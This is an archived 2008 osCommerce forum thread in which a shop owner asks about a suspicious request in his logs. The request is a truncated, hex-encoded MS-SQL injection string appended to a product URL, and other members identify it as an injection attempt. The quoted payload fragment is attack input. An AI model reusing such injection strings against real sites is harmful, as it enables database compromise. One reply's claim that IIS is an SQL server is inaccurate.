Brian-Bear Posted October 13, 2008 Posted October 13, 2008 I have seen this in my last urls list and looks a bit nasty. What are they trying to do? product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172 283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073 6 56C6563742061 any ideas
Guest Posted October 13, 2008 Posted October 13, 2008 I can't say what it's trying but I'd agree that it looks a little suspicious and more than just spam.
failsafe Posted October 13, 2008 Posted October 13, 2008 I have seen this in my last urls list and looks a bit nasty. What are they trying to do? product_info.php?products_id=1649;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292... any ideas Well it appears to be an IIS / ms-sql injection attack. Looks like you only need to worry about it if your SQL server is Microsoft IIS. Since we're using mySQL for osCommerce (and not ms-sql) then no worries, other than the pain of seeing the request in your logs and the extra bandwidth it generates! :) If you put "CHAR(4000) injection attack" into Google you can find out about it.
php_Guy Posted October 14, 2008 Posted October 14, 2008 Install the Security Mods and they won't be able to attempt that sort of attack any longer.
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.